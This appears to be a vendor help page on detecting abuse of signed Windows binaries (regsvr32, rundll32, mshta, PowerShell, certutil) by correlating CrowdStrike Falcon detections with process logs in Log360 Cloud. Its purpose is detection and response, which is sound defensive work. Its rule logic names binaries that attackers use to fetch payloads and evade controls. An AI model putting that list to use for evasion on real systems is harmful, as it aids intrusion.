- Home
- SIEM use cases
- Trusted Binary Weaponization
How to detect trusted binary weaponization with CrowdStrike and Log360
In this page
Understanding the threat
Trusted binary weaponization is a technique where attackers abuse legitimate Windows executables to execute malicious commands, download payloads, bypass security controls, or maintain persistence.
Instead of deploying custom malware, attackers rely on signed system binaries such as regsvr32.exe, rundll32.exe, mshta.exe, powershell.exe, and certutil.exe.
Because these binaries are native to Windows and commonly used for administrative tasks, their activity often appears legitimate and bypasses traditional signature-based detection.
The threat becomes visible when trusted binary execution is correlated with suspicious command-line arguments, abnormal parent-child process relationships, and endpoint detections.
Category
Endpoint Threat
Relevant MITRE ATT&CK® mapping
This use case maps to the following ATT&CK tactics and techniques:
- T1218 – Signed Binary Proxy Execution
- T1059 – Command and Scripting Interpreter
- TA0005 – Defense Evasion
Relevant compliance mapping
- NIST SP 800-53 SI-4 – Information System Monitoring
- NIST SP 800-53 SI-7 – Software Integrity
- CIS Controls v8 – Audit Log Management
Scenario
A Windows enterprise environment observes unusual process execution activity involving trusted Windows binaries.
Within a short timeframe:
- regsvr32.exe executes remote script content
- mshta.exe launches encoded PowerShell commands
- rundll32.exe spawns unexpected child processes
At the same time, CrowdStrike Falcon generates behavioral detections associated with suspicious execution techniques.
Initially, the activity does not appear critical because:
- The binaries are legitimate Windows executables
- No malware file is written to disk
- Individual executions resemble administrative activity
Further investigation reveals that attackers weaponized trusted binaries to execute malicious payloads and evade traditional detection controls.
What went wrong?
- Trusted binaries were treated as low-risk activity
- Suspicious command-line behavior was not prioritized
- Parent-child process anomalies were analyzed separately
- Execution chains were not correlated across telemetry sources
How EDR and SIEM correlation helps
CrowdStrike Falcon identifies suspicious execution behavior involving trusted Windows binaries. However, isolated detections may not fully reveal the execution sequence or attacker intent.
Log360 Cloud correlates:
- Falcon behavioral detections
- Process creation events
- Suspicious command-line execution
- Abnormal parent-child process relationships
When trusted binaries execute suspicious commands or spawn unusual child processes, Log360 identifies a high-confidence trusted binary abuse pattern and escalates the activity for investigation.
Threats at the gate: Real-world trends
- Attackers increasingly rely on LOLBins to evade traditional security controls.
- File-less attacks commonly abuse trusted binaries for execution and persistence.
- Signed Microsoft executables are frequently weaponized during post-compromise activity.
Use case objective
To detect malicious use of trusted Windows binaries by correlating suspicious execution behavior and endpoint telemetry.
Prerequisites
- CrowdStrike Falcon Event Streams extension: Install and configure the extension in Log360 Cloud.
- Windows process monitoring enabled: Ensure Event ID 4688 or Sysmon Event ID 1 is collected.
- Command-line logging enabled: Capture process execution arguments.
- Sysmon configuration enabled: Configure detailed process creation telemetry.
- Log forwarding configured: Ensure Windows and CrowdStrike logs are ingested into Log360 Cloud.
How to detect trusted binary weaponization in Log360 Cloud
Step 1
Configure CrowdStrike Falcon Event Streams along with Windows Security logs or Sysmon logs as data sources in Log360 Cloud. Verify that process execution telemetry and Falcon detections are being ingested successfully.
Step 2
Ensure process creation events capture process names, command-line execution details, and parent-child process relationships. Verify that logging is enabled for commonly abused binaries such as regsvr32.exe, rundll32.exe, mshta.exe, and powershell.exe.
Step 3
Navigate to Security > Rules and enable the detection rule named Trusted Binary Weaponized.
The rule correlates suspicious execution behavior involving trusted Windows binaries with Falcon behavioral detections.
Detection rule reference
| Field | Value |
|---|---|
| Rule name | Trusted Binary Weaponized |
| Description | Detects malicious use of trusted Windows binaries through suspicious execution behavior |
| Objective | Identify weaponized LOLBin activity and fileless execution techniques |
| Severity | Critical |
| Detection type | Correlation rule |
| Detection mode | Real-time |
Detection logic
The rule triggers when:
- Trusted binaries such as regsvr32.exe, rundll32.exe, mshta.exe, or powershell.exe execute suspicious command-line activity
- Abnormal child process spawning is detected
- CrowdStrike Falcon generates related behavioral detections
- The events occur within a defined timeframe
Grouping fields: ENDPOINT_NAME, USERNAME
Step 4
Navigate to Reports > Applications > CrowdStrike Falcon and review behavioral detections, execution trends, and endpoint activity associated with the affected systems.
Step 5
Navigate to Alerts > Manage Alert Profiles and configure a Critical severity alert profile for the Trusted Binary Weaponized rule. Enable real-time notifications for SOC analysts.
Step 6
When the alert is triggered, investigate the activity in the Incident Workbench by reviewing command-line execution details, analyzing parent-child process behavior, and validating associated Falcon detections.
Mitigation and response with CrowdStrike and Log360
With CrowdStrike Falcon
- Isolate affected endpoints
- Terminate suspicious trusted binary executions
- Investigate behavioral detections
- Monitor abnormal LOLBin activity
- Validate indicators against known attacker methodologies
With Log360 Cloud
- Correlate process and endpoint telemetry
- Reconstruct trusted binary attack chains
- Automate containment workflows
- Centralize investigation across endpoints and users
- Detect abnormal execution behavior using UEBA
Combined outcome
CrowdStrike Falcon provides behavioral visibility into suspicious endpoint activity, while Log360 Cloud correlates process execution behavior and trusted binary abuse patterns to identify stealthy attack techniques earlier in the attack lifecycle.
Next steps
- Enable UEBA to identify abnormal execution behavior.
- Restrict unnecessary LOLBin usage across endpoints.
- Enhance command-line execution monitoring.
- Automate response workflows using SOAR.
- Continuously monitor parent-child process anomalies across endpoints.
